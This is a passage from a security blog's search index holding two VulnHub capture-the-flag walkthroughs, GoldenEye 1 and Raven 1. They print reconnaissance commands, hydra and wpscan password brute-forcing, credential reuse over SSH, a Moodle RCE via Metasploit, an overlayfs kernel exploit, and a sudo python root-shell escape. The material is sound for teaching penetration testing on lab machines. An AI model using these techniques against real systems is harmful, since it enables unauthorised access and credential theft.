                            GoldenEye 1 machine (from now on: victim machine) will have only one network interface:

                            • eth0 interface.
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-we-need-to-identify-our-ip-and-afterwards-our-ips-victim-address","title":"First, we need to identify our IP, and afterwards our IP's victim address.","text":"

                            For that we'll be using netdiscover.

                            ip a\n

                            eth1 interface of the attacker machine will be: 192.168.56.105.

                            sudo netdiscover -i eth1 -r 192.168.56.105/24\n

                            Results:

                             3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                   \n _____________________________________________________________________________\n   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      \n -----------------------------------------------------------------------------\n 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor                                                  \n 192.168.56.100  08:00:27:66:9a:ab      1      60  PCS Systemtechnik GmbH                                          \n 192.168.56.101  08:00:27:dd:34:ac      1      60  PCS Systemtechnik GmbH\n ```\n\n So, the victim's IP address is: 192.168.56.101.\n\n\n#### **Secondly**, let's run a port scan to see services:\n\n```bash\nnmap -p- -A 192.168.56.101\n

                            And results:

                            Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 13:31 EST\nNmap scan report for 192.168.56.101\nHost is up (0.00013s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE SERVICE  VERSION\n25/tcp    open  smtp     Postfix smtpd\n|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n| ssl-cert: Subject: commonName=ubuntu\n| Not valid before: 2018-04-24T03:22:34\n|_Not valid after:  2028-04-21T03:22:34\n|_ssl-date: TLS randomness does not represent time\n80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))\n|_http-title: GoldenEye Primary Admin Server\n|_http-server-header: Apache/2.4.7 (Ubuntu)\n55006/tcp open  ssl/pop3 Dovecot pop3d\n|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP USER UIDL PIPELINING AUTH-RESP-CODE CAPA\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n55007/tcp open  pop3     Dovecot pop3d\n|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE STLS SASL(PLAIN) USER CAPA PIPELINING TOP UIDL\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 40.89 seconds\n

                            As there is an Apache server, let's see what is in there. We'll be opening http://192.168.56.101 in our browser.

                            In the front page they will give you an url to login: /serv-home/, and looking at the source code, in the terminal.js file you can read a section commented out:

                            //\n//Boris, make sure you update your default password. \n//My sources say MI6 maybe planning to infiltrate. \n//Be on the lookout for any suspicious network traffic....\n//\n//I encoded you p@ssword below...\n//\n//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;\n//\n//BTW Natalya says she can break your codes\n//\n

                            Now, we have two usernames: boris and natalya, and we also have an aparently URL-encoded password. By using Burp Decode, we can extract the password: InvincibleHack3r

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-now-we-can-browse-to-http19216856101sev-home","title":"Third, now we can browse to http://192.168.56.101/sev-home","text":"

                            A Basic-Authentification pop-up layer will be displayed. To login into the system, enter:

                            • user: boris
                            • password: InvincibleHack3r
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-in-the-landing-page-we-can-read-this-valuable-information","title":"Fourth, in the landing page we can read this valuable information:","text":"

                            \"Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port\".

                            Also by looking at the source code we can read this commented line:

                            <!-- Qualified GoldenEye Network Operator Supervisors: Natalya Boris -->\n

                            mmmm

                            As we know there are some high ports (such as 55006 and 55007) open and running dovecot pop3 service, maybe we can try to access it with the telnet protocol in port 55007. Also, we could have used netcat.

                            telnet 192.168.56.101 55007\n

                            Results:

                            Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASSWORD InvincibleHack3r\n-ERR Unknown command.\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\nUSER natalya\n+OK\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-lets-try-to-brute-force-the-service-by-using-hydra","title":"Fifth, let's try to brute-force the service by using hydra.","text":"
                            hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

                            And the results:

                            Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 13:57:42\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: boris   password: secret1!\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 14:00:19\n

                            We do the same for the user natalya.

                            hydra -l natalya -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

                            And the results:

                            Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 13:45:18\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: natalya   password: bird\n[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-19 13:47:19\n

                            So now, we have these credentials for the dovecot pop3 service:

                            • user: boris
                            • password: secre1!

                            • user: natalya

                            • password: bird
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-lets-access-dovecot-pop3-service","title":"Sixth, let's access dovecot pop3 service","text":"

                            We can use telnet as before:

                            telnet 192.168.56.101 55007\n

                            Results:

                            Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASS secret1!\n+OK Logged in.\n

                            Let's going to see all messages in our inbox:

                            # List messages in inbox\nLIST\n

                            Results:

                            +OK 3 messages:\n1 544\n2 373\n3 921\n.\n

                            Now let's RETRIEVE all messages from inbox:

                            # For retrieving first message:\nRETR 1\n\n# For retrieving second message:\nRETR 2\n\n# For retrieving third message:\nRETR 3\n\n# For retrieving fourth message:\nRETR 4\n\n# There was no fifth message\n

                            And messages are:

                            RETR 1\n+OK 544 octets\nReturn-Path: <root@127.0.0.1.goldeneye>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id D9E47454B1\n        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nMessage-Id: <20180425022326.D9E47454B1@ubuntu>\nDate: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nFrom: root@127.0.0.1.goldeneye\n\nBoris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.\n.\nRETR 2\n+OK 373 octets\nReturn-Path: <natalya@ubuntu>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id C3F2B454B1\n        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nMessage-Id: <20180425024249.C3F2B454B1@ubuntu>\nDate: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nFrom: natalya@ubuntu\n\nBoris, I can break your codes!\n.\nRETR 3\n+OK 921 octets\nReturn-Path: <alec@janus.boss>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from janus (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id 4B9F4454B1\n        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nMessage-Id: <20180425025235.4B9F4454B1@ubuntu>\nDate: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nFrom: alec@janus.boss\n\nBoris,\n\nYour cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!\n\nOnce Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....\n\nPS - Keep security tight or we will be compromised.\n\n.\nRETR 5\n-ERR There's no message 5.\n

                            Now, let's do the same for natalya:

                            \u2514\u2500$ telnet 192.168.56.101 55007\nTrying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser natalya\n+OK\npass bird\n+OK Logged in.\nlist\n+OK 2 messages:\n1 631\n2 1048\n.\nretr 1\n+OK 631 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id D5EDA454B1\n        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nMessage-Id: <20180425024542.D5EDA454B1@ubuntu>\nDate: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nFrom: root@ubuntu\n\nNatalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.\n\nAlso, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.\n.\nretr 2\n+OK 1048 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from root (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 17C96454B1\n        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nMessage-Id: <20180425031956.17C96454B1@ubuntu>\nDate: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nFrom: root@ubuntu\n\nOk Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of \"security\"...it'll get the change order escalated without much hassle :)\n\nOk, user creds are:\n\nusername: xenia\npassword: RCP90rulez!\n\nBoris verified her as a valid contractor so just create the account ok?\n\nAnd if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir\n**Make sure to edit your host file since you usually work remote off-network....\n\nSince you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.\n.\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#exploitation","title":"Exploitation","text":"

                            Somehow, without really being aware of it, we have already entered into an Exploitation phase. In this phase, our findings will take us further so eventually we will be gaining access to the system.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-use-credentials-to-access-the-webservice","title":"First, use credentials to access the webservice","text":"

                            From our reconnaissance / exploitation of the dovecot pop3 service we have managed to gather these new credentials:

                            • username: xenia
                            • password: RCP90rulez!

                            And we also have the instruction to add this line to our /etc/hosts file:

                            # We open the /etc/hosts file and add this line at the end\n192.168.56.101  severnaya-station.com/gnocertdir \n

                            Now, in our browser we can go to that address and we can confirm that we have a moodle cms. We can login using the credentials for the user xenia.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#second-gather-information-and-try-to-exploit-it","title":"Second, gather information and try to exploit it","text":"

                            Browsing around we can retrieve the name of twot other users:

                            With these two new users in mind we can use hydra again to try to brute force them. Run in two separate tabs:

                            hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\nhydra -l admin -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3 \n

                            And we obtain results only for the username doak:

                            Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 12:07:05\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: doak   password: goat\n1 of 1 target successfully completed, 1 valid password found\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-login-into-dovecot-using-the-credentials-found","title":"Third, login into dovecot using the credentials found","text":"
                            • user: doak
                            • password: goat

                            And now, let's read the messages:

                            Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser doak\n+OK\npass goat\n+OK Logged in.\nlist\n+OK 1 messages:\n1 606\n.\nretr 1\n+OK 606 octets\nReturn-Path: <doak@ubuntu>\nX-Original-To: doak\nDelivered-To: doak@ubuntu\nReceived: from doak (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 97DC24549D\n        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nMessage-Id: <20180425034731.97DC24549D@ubuntu>\nDate: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nFrom: doak@ubuntu\n\nJames,\nIf you're reading this, congrats you've gotten this far. You know how tradecraft works right?\n\nBecause I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......\n\nusername: dr_doak\npassword: 4England!\n\n.\n
                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-log-into-moodle-with-new-credentials-and-browse-the-service","title":"Fourth, Log into moodle with new credentials and browse the service","text":"

                            As we have disclosed, again, a new credential for the moodle site, let's login and see what we can find:

                            • username: dr_doak
                            • password: 4England!

                            After browsing around as user dr_doak we can download a field with some more information:

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-analyse-the-image","title":"Fifth, analyse the image","text":"

                            An image in a secret location is shared with us. Let's download it from http://severnaya-station.com/dir007key/for-007.jpg

                            Aparently this image has nothing juicy, but if we look their metadata with exiftool, then... magic happens:

                            exiftool for-007.jpg \n

                            Results:

                            ExifTool Version Number         : 12.49\nFile Name                       : for-007.jpg\nDirectory                       : Downloads\nFile Size                       : 15 kB\nFile Modification Date/Time     : 2023:01:19 12:37:35-05:00\nFile Access Date/Time           : 2023:01:19 12:37:35-05:00\nFile Inode Change Date/Time     : 2023:01:19 12:37:35-05:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image/jpeg\nJFIF Version                    : 1.01\nX Resolution                    : 300\nY Resolution                    : 300\nExif Byte Order                 : Big-endian (Motorola, MM)\nImage Description               : eFdpbnRlcjE5OTV4IQ==\nMake                            : GoldenEye\nResolution Unit                 : inches\nSoftware                        : linux\nArtist                          : For James\nY Cb Cr Positioning             : Centered\nExif Version                    : 0231\nComponents Configuration        : Y, Cb, Cr, -\nUser Comment                    : For 007\nFlashpix Version                : 0100\nImage Width                     : 313\nImage Height                    : 212\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)\nImage Size                      : 313x212\nMegapixels                      : 0.066\n

                            One field catches our attention: \"Image Description\". The value for that field is not very... descriptable: eFdpbnRlcjE5OTV4IQ==.

                            The two equal signs at the end suggest that maybe base64 encode encryption is been employed. Let's use BurpSuite to decode it.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-now-we-can-login-into-the-moodle-with-admin-credentials","title":"Sixth, now we can login into the moodle with admin credentials","text":"
                            • user: admin
                            • password: xWinter1995x!

                            As we are admin, we can browse in the sidebar to: Setting > Site administration > Server > Environment. There we can grab the banner with the version of the running moodle: 2.2.3.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#seventh-google-for-some-exploits-for-moodle-223","title":"Seventh, google for some exploits for moodle 2.2.3","text":"

                            You can get to these results:

                            • https://www.rapid7.com/db/modules/exploit/multi/http/moodle_cmd_exec/.
                            • https://www.exploit-db.com/exploits/29324

                            Here, an explanation of the vulnerability: moodle 2.2.3 has a plugin for checking out spelling. When creating a blog entry (for instance), the user can click on a bottom to check the spelling. In the backend, this triggers a connection with a service. Vulnerability here is that an admin user can modify the path to the service to include a one-lined reverse shell. This shell is going to be called when you click on the Check spelling button. For this to work, open a netcat listener in your machine. Also, in the plugins settings, you might need to change the configuration.

                            I'm not a big fan of metasploit, but in this case I've used it.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#eight-metasploit-geting-a-shell","title":"Eight: Metasploit, geting a shell","text":"

                            Module multi/http/moodle_spelling_binary_rce

                            I've employed the module multi/http/moodle_spelling_binary_rce. Basically, Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln. Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey and use this to escalate privileges to that of an admin, allowing the module to pop a shell as a previously unprivileged authenticated user. This module was tested against Moodle version 2.5.2 and 2.2.3.

                            • https://nvd.nist.gov/vuln/detail/CVE-2013-3630
                            • https://nvd.nist.gov/vuln/detail/CVE-2013-4341
                            • https://www.exploit-db.com/exploits/28174
                            • https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats

                            Now, we move our session to background with CTRL-z.

                            Module post/multi/manage/shell_to_meterpreter

                            Our goal now is going to be to move from a cmd/unix shell to a more powered meterpreter. This will allow us later on to execute a module in metasploit to escalate privileges.

                            search shell_to_meterpreter\n

                            We'll be using the module \"post/multi/manage/shell_to_meterpreter\".

                            We only need to set session, and LHOST.

                            If everything is ok, now we'll have two sessions.

                            We've done this to be able to escalate privileges, since the session with shell cmd/unix didn't allow us to escalate privileges using exploit/linux/local/overlayfs_priv_esc.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#escalating-privileges","title":"Escalating privileges","text":"

                            Module exploit/linux/local/overlayfs_priv_esc

                            We'll be using this module to escalate privileges. How have we got here? We run:

                            uname -a\n

                            Results:

                            Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux\n

                            Now, after googling \"exploit escalate privileges ubuntu 3.13.0\", we get:

                            • https://www.exploit-db.com/exploits/37292.
                            • https://www.rapid7.com/db/modules/exploit/linux/local/overlayfs_priv_esc/.

                            Using any of these ways to exploit Goldeneye1 is ok. If you go for the first option and upload the exploit to the machine, you will soon realize that the victim machine has not installed the gcc compiler, so you will need to use cc compiler (and modify the code of the exploit). As for the second option, which I chose, metasploit is not going to work with the cmd/unix session. Error message is similar: gcc is not installed and code can not be compiled. You will need to set the meterpreter session for this attack to succeed.

                            The module exploit/linux/local/overlayfs_priv_esc attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested).

                            To exploit it, we need to use session 2.

                            ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#last-getting-the-flag","title":"Last, getting the flag","text":"

                            Now, we can cat the flag:

                            cat .flag.txt\nAlec told me to place the codes here: \n\n568628e0d993b1973adc718237da6e93\n\nIf you captured this make sure to go here.....\n/006-final/xvf7-flag/\n

                            Isn't is just fun???

                            ","tags":["walkthrough"]},{"location":"vulnhub-raven-1/","title":"Walkthrough: Raven 1, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#about-the-machine","title":"About the machine","text":"data Machine Raven 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1pCFv-OXmknLVluUu_8ZCDr1XYWPDfLxW Download Mirror https://download.vulnhub.com/raven/Raven.ova Size 1.4 GB Author William McCann Release date 14 August 2018 Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking. Difficulty Beginner/Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#setting-up-the-machines","title":"Setting up the machines","text":"

                            I'll be using Virtual Box.

                            Kali machine (from now on: attacker machine) will have two network interfaces:

                            • eth0 interface: NAT mode (for internet connection).
                            • eth1 interface: Host-only mode (for attacking the victim machine).

                            Raven 1 machine (from now on: victim machine) will have only one network interface:

                            • eth0 interface.

                            After running

                            ip a\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#identify-victims-ip","title":"Identify victim's IP","text":"

                            we know that the attacker's machine IP address is 192.168.56.102/24. To discover the victim's machine IP, we run:

                            sudo netdiscover -i eth1 -r 192.168.56.102/24\n

                            These are the results:

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

                            Now we can run a scanner to see which services are running on the victim's machine:

                            sudo nmap -p- -A 192.168.56.104\n

                            And the results:

                            Having a web server in port 80, it's inevitable to open a browser and have a look at it. Also, at the same time, we can run a simple enumeration scan:

                            dirb http://192.168.56.104\n

                            The results are pretty straightforward:

                            There is a wordpress installation (maybe not well accomplished) running on the server. Also there are some services installed such as PHPMailer.

                            By reviewing the source code in the pages we find the first flag:

                            Here, flag1 in plain text:

                            <!-- End footer Area -->        \n            <!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#deeper-scan-with-specific-tool-for-wordpress-service-wpsca","title":"Deeper scan with specific tool for wordpress service: wpsca","text":"

                            First, let's start by running a much deeper scanner with wpscan. We'll be enumerating users,

                            wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

                            And the results show us some interesting findings:

                            First, one thing that later may be useful: XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authentication to post entries. It's also useful in wordpress for retrieving pings when a post is linked back. This means that it's also an open door for exploitation. We'll return to this later.

                            Opening the browser in http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the wordpress installation.

                            As a matter of fact, by clicking on http://192.168.56.104/wp-admin/install.php, we end up on a webpage like this:

                            Nice, so, the link button is giving us a tip, we need to include a redirection in our /etc/hosts file.

                            sudo nano /etc/hosts\n

                            At the end of the file we add the following line:

                            192.168.56.104  local.raven\n# CTRL-s  and CTRL-x\n

                            Now we can browse perfectly the wordpress site. Also, finishing our wpscan, there are two more interesting findings:

                            These findings are:

                            • Wordpress: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
                            • User enumeration: steven and michael.

                            We can also detect those users manually, simply by brute-forcing the author enumeration. See screenshot:

                            To manually brute force users in a wordpress installation, you just need to go to:

                            • targetURL/?author=1

                            Author with id=1 (as in the example) is the first user created during the CMS installation, which usually coincides with the admin user. To see the next user, you just need to change the number. Ids are correlative. By checking the source code (as in the previous screenshot) you can gather users (steven and michael), but also worpress version (4.8.7) and theme (TwentySeventeen).

                            So, what do we have so far?

                            • Server: Apache/2.4.10 (Debian)
                            • CMS: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05)
                            • Theme: twentySeventeen
                            • XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php.
                            • Login page: http://raven.local/wordpress/wp-login.php
                            • Two users: steven, michael.
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#exploiting-findings","title":"Exploiting findings","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#bruce-forcing-passwords-for-the-cms","title":"Bruce-forcing passwords for the CMS","text":"

                            Having found anything, after testing input validations in the endpoints of the application, I'm going to try to brute force login with steven, who is the user with id=2.

                            wpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt  --usernames steven -t 25\n

                            Resulst:

                            Now, we have:

                            • user: steven
                            • password: pink84

                            These credentials are good to login into the wordpress and... retrieve flag3!!!

                            Flag3 was hidden in the draft of a post. Here, in plain text:

                            flag3{afc01ab56b50591e7dccf93122770cd2}\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#using-credentials-found-for-wordpress-in-a-different-service-ssh","title":"Using credentials found for wordpress in a different service (ssh)","text":"

                            It's not uncommon to use same usernames and passwords across services. Wo, having found steven's password for wordpress, we may try to use the same credentials in a different service. Therefore, we will try to access port 22 (which was open) and see if these creds are valid:

                            ssh steven@192.168.56.104\n

                            After confirming \"fingerprinting\", we are asked to introduce steven's password, and... it works!

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#escalation-of-privileges","title":"Escalation of privileges","text":"

                            We can see who we are (id), to which groups we belong (id), the version of the running server (uname -a), and which commands we are allowed to run (sudo -l). And here comes the juicy part. As you may see in the screenshot we can run the command python as root without entering a password.

                            Resources: This site is a must when it comes to Unix binaries that can be used to bypass local security restrictions https://gtfobins.github.io

                            In particular, we can easily spot this valid exploit: https://gtfobins.github.io/gtfobins/python/#sudo. What does it say about python? If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                            This is just perfect. So to escalate to root we just need to run:

                            sudo python -c 'import os; os.system(\"/bin/sh\")'\n

                            See the results:

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#getting-the-flags","title":"Getting the flags","text":"

                            Printing flags now is not difficult at all:

                            find . -name flag*.txt 2>/dev/null \n

                            And results:

                            ./var/www/flag2.txt\n./root/flag4.txt\n

                            We can print them now:

                            cat /var/www/flag2.txt\n
                            Results:

                            flag2{fc3fd58dcdad9ab23faca6e9a36e581c}\n
                            cat /root/flag4.txt\n

                            Results:

                            ______                      \n\n| ___ \\                     \n\n| |_/ /__ ___   _____ _ __  \n\n|    // _` \\ \\ / / _ \\ '_ \\ \n\n| |\\ \\ (_| |\\ V /  __/ | | |\n\n\\_| \\_\\__,_| \\_/ \\___|_| |_|\n\n\nflag4{715dea6c055b9fe3337544932f2941ce}\n\nCONGRATULATIONS on successfully rooting Raven!\n\nThis is my first Boot2Root VM - I hope you enjoyed it.\n\nHit me up on Twitter and let me know what you thought: \n\n@mccannwj / wjmccann.github.io\n

                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-and-tools","title":"Commands and tools","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#commands-used-to-exploit-the-machine","title":"Commands used to exploit the machine","text":"
                            sudo netdiscover -i eth1 -r 192.168.56.102/24\nsudo nmap -p- -A 192.168.56.104\ndirb http://192.168.56.104\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\necho \"192.168.56.104    local.raven\" sudo >> /etc/hosts\nwpscan --url http://192.168.56.104/wordpress --passwords /usr/share/wordlists/rockyou.txt  --user steven -t 25\nssh steven@192.168.56.104\nsudo python -c 'import os; os.system(\"/bin/sh\")'\nfind . -name flag*.txt 2>/dev/null\n
                            ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#tools","title":"Tools","text":"
                            • dirb.
                            • netdiscover.
                            • nmap.
                            • wpscan.
